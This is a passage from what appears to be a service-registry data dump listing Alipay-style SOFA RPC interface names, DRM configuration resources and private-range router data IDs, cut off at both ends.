ipay.pcreditagreement.common.service.agreement.general.PcreditGeneralAgreementHandleFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.unitestcenter.capability.common.facade.CapabilityNodeFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcreditcore.service.reduct.PcreditBillAmountAdjustFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.superapi.client.SystemAppInvokeService:1.0:logisticfinsandbox@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mnotify.biz.client.client.rpc.MNotifyCallbackRPCService:1.0:bizfund@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.83.84.221#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.finorm.core.service.guardian.MetaDataDiagramCoreService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fincommontaskhub.backend.service.facade.task.BackendTaskServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.routeclient.interfacename:pcdevopssff#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.afts.common.service.facade.C2CTemplateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchstm.common.service.facade.mart.facade.MartOrderQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ordercore.mrch.common.service.api.BatchTempQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finfocore:name=com.alipay.finfocore.common.service.integration.drm.DrmDynamicResource.tairDegradationFlag,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.charge:name=com.alipay.metadata.conf.cache.NearConfClientDrm.metadataLoadingMode,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mobileha.facade.antha.AnthaActivityVenueFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","cn.com.antcloud.filex.admin.FileExchangeEndpointManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.routeclient.interfacename:zmoperationprod#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","DATA_ID_11.158.47.67#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","DATA_ID_30.50.40.13#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.securitydata.common.service.facade.credible.CredibleService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cloud.acsellcore.common.service.facade.ltc.notice.DingTalkNoticeFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.publiccore.common.service.facade.account.MobileQrCodeFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.recruitcore.facade.api.enroll.EnrollManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.linka:name=com.alipay.common.security.dresource.SecurityCommonDrm.paramCheckPayloads,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.sofa.rpc.elastic.ElasticService:1.0:dpdatadiagnosis@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.securityops.common.service.client.spi.SecOpsChangeCallbackService:1.0:socplt@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.73.180.103#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.pcreditbenefit.facade.service.DiscountManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.airprod.common.service.facade.airdut.AirDutThirdAuthServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilegw.adapterservice.MobileAdapterService:1.0:bkfundportal@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:pservice@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchportalcore.common.service.benefit.facade.BenefitManageServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.83.97.245#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","DATA_ID_11.160.159.110#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","NS_Pub_Servers_TP_C_SECURITY_INTL#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.promocenter.facade.api.prototype.ActivityVoucherVerifyRangeQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finstrategy.common.service.facade.adjustment.AdjustmentFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.common.event.UniformEventMessageListener:1.0:testDefaultMsg@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.opscloudcore.framework.core.facade.OpscloudClientServiceFacade:1.0:ldc@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.cloudengine:name=com.alipay.cloudengine.resmanager.processmng.resValue,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","config:com.alipay.finbatchcore.common.service.facade.kyc.KycProofMoveFacade:1.0:rfmbatchcore@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.appxagg.common.service.facade.api.management.scenemsg.MsgTemplateMngConfigFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.ipay.irecon2.common.service.facade.api.FileBatchNoInfoFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.50.120.44#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.promoguard.common.service.facade.risk.api.RuleBizChangeRuleFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.instservice.common.service.facade.instserviceconfig.IscProductFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.lendpofprod:name=com.alipay.lendpofprod.core.shared.drm.FlowConfigDrm.batchBudgetGrayUserFlow,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.sofa.rpc.elastic.ElasticService:1.0:ccmimpluschannel@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.hainaprod.common.service.facade.api.actrule.ActRuleFactorMngFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.caprod.service.ukey.facade.UkeyTradeInfoMangeService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.sofa.rpc.elastic.ElasticService:1.0:ngfeguard@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.ipay.imif.opcenter.common.service.facade.crm.v2.api.CrmMerchantLabelQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mservice.common.service.facade.api.smartcall.SmartcallCallbackFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.icifTairCache.ldcTairWeight,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.tairmanager.interfaces.endpoint.facade.rest.tbase.TBaseAppCapacityFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.charge:name=com.alipay.dtqualitycore.drm.DataqualityConfigDrm.sampleRate,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.pcreditprod.service.MultipleAccountsApplicationFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Sub_Servers_TP_S_BKSCMPROD#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.mockapp:name=com.alipay.sla.disaster.drm.SlaDisasterRuleConfigDrm.slaConfig,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.pcardcore.common.service.facade.mpcard.MPcardGzoneManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finfundprotocol.common.service.facade.drm.ShumiSwitchDrmService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.dcepcoin.core.service.processor.LdcProcessor:1.0:paymentPayerProcessor@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.zpaas.facade.api.JiuzhouOperationQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.antfeaturelib.common.facade.service.DataViewCalcService:1.0:PromoPlatform_malgo@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.olive.facade.api.plan.PlanCrowdManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finpwm:name=com.alipay.finpwm.biz.wishsavings.drm.impl.WishSavingsSysDRMResource.checkContractStatus,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.oceanbase.obforumcore.service.college.TrainingFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_10.15.240.38#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.sofa.rpc.elastic.ElasticService:1.0:antfeatureflow@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.rinsight.biz.manager.analysis.spi.ExternalAlgoSpi:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mapi.gateway.invoke.webservice.SysExterfaceInvokeService:1.0:couponcore@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finfocore:name=com.alipay.checkroute.common.service.checkersdk.drm.SDKConfigDRM.stop,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_30.55.112.209#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.fc.mif.common.service.facade.MerchantCertificateQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.fraudmng:name=com.alipay.cif.client.drm.ConvertorClassloaderSwitcher.status,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.promokernel.common.checker.facade.api.CampCacheModelQueryCheckerFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.promocenter.facade.api.delivery.DeliveryManageFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.opscloudcore.riskservice.spi.OpsChngSyncRiskService:1.0:drm_consistent_checker@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.openitemcore.common.service.facade.api.management.business.BusinessMngQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.158.0.35#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.minicenter.common.service.facade.api.publicrelation.MiniAppRelationQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.charge:name=com.alipay.charge.common.dal.conf.impl.ChargeNewDRMConfigureImpl.reChargeCondition,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.accenter.service.facade.api.AccenterTitleManageFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.aliinvoiceprod.integration.consumeprod.ConsumeServiceClient:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.openhome.facade.qrcode.AppQrRuleFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbalgocenter.common.service.facade.api.marketing.MarketingAlgoServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobileappcommon.common.service.facade.baas.TfAPIFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.custeval.common.service.facade.dataprocess.realtime.RdpCrowdService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mshopprod.common.service.allin.facade.KbPropertyApplyManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.antfinancial.antchain.cloud.endpoint.facade.AkdfServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.insptmarket.client.account.extension.AccountCardFetcherComponent:1.0:insptmarket@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.udataservice.service.facade.DataSetOperatorFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.secucommunity.activity.api.SpringFestivalFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbtraffic.common.service.facade.api.DistributionQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fundcardprod.common.service.fundcard.FundCardReturnLdcFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.paramcore.common.service.spi.ParmMntListGreyPubSpi:1.0:masterdata@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.paramcore.common.service.manage.facade.api.ParmDataImportManagerFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.ordermng:name=com.alipay.ordermng.common.util.drm.LoggerDRM.serviceDetailLog,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mapi.gateway.invoke.webservice.SysExterfaceInvokeService:1.0:voucherprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.connect.mobile.codec.front.facade.api.mpm.AcMpmDecodeService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.almcenter.service.facade.api.calendar.CalendarQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.nodejs.ConsumerService:1.0:imageupload@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.inshealthcore.common.service.facade.api.right.GiftProductRightsQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.73.182.44#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.cfmng:name=com.alipay.common.security.util.dresource.SecurityCommonUtilDrm.vmEmergencyActions,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.userview.facade.UserLabelUniformOperateService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.jarvis.service.facade.api.dict.DictManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alibaba.dt.dataphin.openapi.BizUnitOpenService:1.0:dpide@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.minicore.common.service.facade.search.api.AppSearchFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fraudmng.common.service.facade.eventconfig.api.EventConfigService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.securitycap:name=com.alipay.common.datacollector.rule.internal.DataModelRuleCoordinator.dataModelWeight,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.decisionx.facade.DecisionService:1.0:ins@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finfocore:name=com.alipay.finfocore.common.service.integration.drm.DrmFopConfig.closeFundDetailPageInstsStr,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.finpwm:name=com.alipay.finpwm.biz.cpm.drm.CpmSwitchControlDRMResource.wfinNewDetailQuery,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.zdaljdbc:name=com.alipay.zdal.monitor.drm.sandboxhome.aqcPaas_ds.validator,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.pcreditcore.service.reduct.PcreditTransAmountOrderQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.zpaas.zappinfo.facade.update.AppBaselineConfigUpdateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cap.common.service.tenant.CapTenantAccessKeyService:1.0:internal@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbcateringprod.common.service.facade.item.api.CaterItemManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.promocenter.facade.mng.TradeAdminQueryService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.124.181.193#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.almcenter.service.facade.api.funduser.FundYieldQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.iopencore.common.service.facade.InterfaceOpenImageService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finfundprod.common.service.facade.IndexRegionFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.ipay.ifundcontrolmodel.service.facade.fundmodel.basic.accouting.account.AccountFundModelFacade:1.0:accountFundModel@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.csvoice.service.facade.api.ProductService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.36.2.15#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.cicada.common.service.facade.api.service.TransformerFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.opscloudcore.framework.core.facade.OpscloudClientSyncServiceFacade:1.0:zparamcore@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.antfeaturelib.biz.graphstrategy.facade.GraphStrategyLoaderFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.etetestcore.service.api.PayacceptancePayService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.insopenprod.common.service.facade.api.top.InsTcOrderFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:cloudbox@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcreditmng.common.spi.ControlBizFacade:1.0:benefitSkuInfoController@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbsales.common.service.facade.shop.ShopStaffInfoQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.financeprod:name=com.alipay.antvip.client.internal.drm.DrmControl.allAvailable,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:bkmissione_benefitDefinitionFailCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.customscenter:name=com.alipay.zoneclient.internal.DynamicLdcSwitchResource.cityVipSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.pcactivitycore.facade.PcreditActivityCoreAggregationFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.zpaas.zappinfo.facade.query.ResourcePoolQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.ipay.imemberprod.service.facade.api.CardIdentifyService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.promomng.core.service.process.ServiceTask:1.0:groovyScriptServiceTask@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finauth.common.service.facade.message.service.MessageSendFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.charge:name=com.alipay.charge.common.dal.conf.impl.ChargeNewDRMConfigureImpl.adjustActivityListStr,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mrchiscore.common.service.facade.operation.specialsubject.mng.SpecialSubjectMngQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.securityexprod.biz.alipayauth.service.lisa.process.EworkCardProcessPolicyService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.antschedulerconsole.facade.ZoneMigrateOpenApiFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.kmi.common.service.facade.DataKeyFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","NS_Pub_Servers_TP_M_MARKET#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.pcreditmarket.service.PcreditMarketUserFlagQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.poscore:name=com.alipay.cif.client.drm.TairToTbaseSwitch.tbaseRouteGrayMethodsSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.afts.common.service.facade.SchedulerStoreFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:bkbcs_factoringContractAuditProcessCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcardcore.common.service.facade.mpcard.McardPmtInstQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.promobench.common.service.facade.service.PrizeTypeConfigFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.zonemng.facade.api.FlowOpsFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.ipay.ipayment.service.facade.query.RefundQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.peerpay.common.service.facade.api.PPayApplyServiceFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.uioservice.common.service.facade.api.ReturnPayFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.167.198.244#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.ap.gloandecision.common.service.facade.credit.api.CreditAdmitFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.distinguishprod.common.service.facade.pet.PetLoadTestFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:zptcore@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.overseaprod.common.service.remit.RemitConfService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:materialcenterAuditEndCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.tairmanager.interfaces.endpoint.facade.rest.tair.NamespaceTaskFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.autoinsprod.common.service.integration.baoxiancore.CoreClaimServiceClient:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.idpatrol.core.service.inspect.SensitiveWordConfigService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcloanmng.service.facade.PromoConfigFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Pub_Servers_TP_S_1302_*#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.insmobile:name=com.alipay.insmobile.drm.InsRenderDrmClient.templateStageConfig,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:dataEdit_ProcessCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.rinsight.common.base.spi.RinsightListDataRpcSpi:1.0:miniAppOperateLogQueryService@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ap.mobileprod.common.service.facade.user.UserSessionManagementFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.zcbsalescenter.biz.cashing.service.CashingProductPublishSuccessService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.seekers.facade.apis.ConclusionFeedbackServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.assetfluxdecision.biz.service.api.AssetFluxDecisionService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.instfluxdecision.service.api.InstAbilityDecisionService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.securityops.common.service.client.spi.SecOpsChangeCallbackService:1.0:kmi@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobileevent.common.service.facade.MobileEventRecordFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.superlink.service.facade.api.transaction.ClusterMappingService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.cloudnet.facade.common.network.service.LBManageService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","SOFA_PRC_TRANSMIT_GROOT#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","SOFA-SCHEDULER-S-instradeprod-scheduler#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.socialcore.facade.verify.UserVerifyFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.fraudmng:name=com.alipay.metadata.conf.cache.LoadCacheSwitch.loadCaheSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.zoloz.zcif.facade.service.IdentitySyncService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.promocenter:name=com.alipay.promocenter.common.drm.HumanToHumanDrmResource.nearQueryPlayListLimit,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.securitycap:name=com.alipay.cif.client.drm.CifTouchCacheSwitcher.touchCacheSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_30.50.22.95#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","config:com.alipay.frastress.common.service.facade.api.bizindicator.AutoBizKeyIndicatorFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","Alipay.revtrans:name=com.alipay.antvip.client.internal.drm.DrmControl.restrainEnable,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.kbitemprod.common.service.facade.backend.api.KbWorkOrderBackendQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.ordermng:name=com.alipay.zcache.tbase.hypTair.localCacheSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.miniprod.common.service.facade.api.minitemplatemsg.TemplateMsgDataFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alibaba.alsc.activity.api.recommend.ActivityRecommendService:1.0@tri#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.nodejs.ConsumerService:1.0:zmcustbff@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.gfsettle.facade.SampleService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.lifemng:name=com.alipay.cif.model.cache.CifCOControlSwitch.switchCurUserStatus,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_30.73.156.35#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.insmobile:name=com.alipay.cif.model.cache.CifCOControlSwitch.shadowReadCustProp,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.alphad.common.service.facade.dataset.api.IDatasetSnapshotFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA_PRC_TRANSMIT_INSMERCHANTPROD#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.securitydata.common.service.facade.userriskinfo.UserRiskInfoService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA_PRC_TRANSMIT_MOON#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mitemcenter.common.service.facade.api.group.ItemGroupManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.agdsbatch.facade.AgdsBatchGeneralControlFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.inshealthprod.facade.HealthAccountManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.openinsight.common.service.facade.rec.api.RecActivityFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#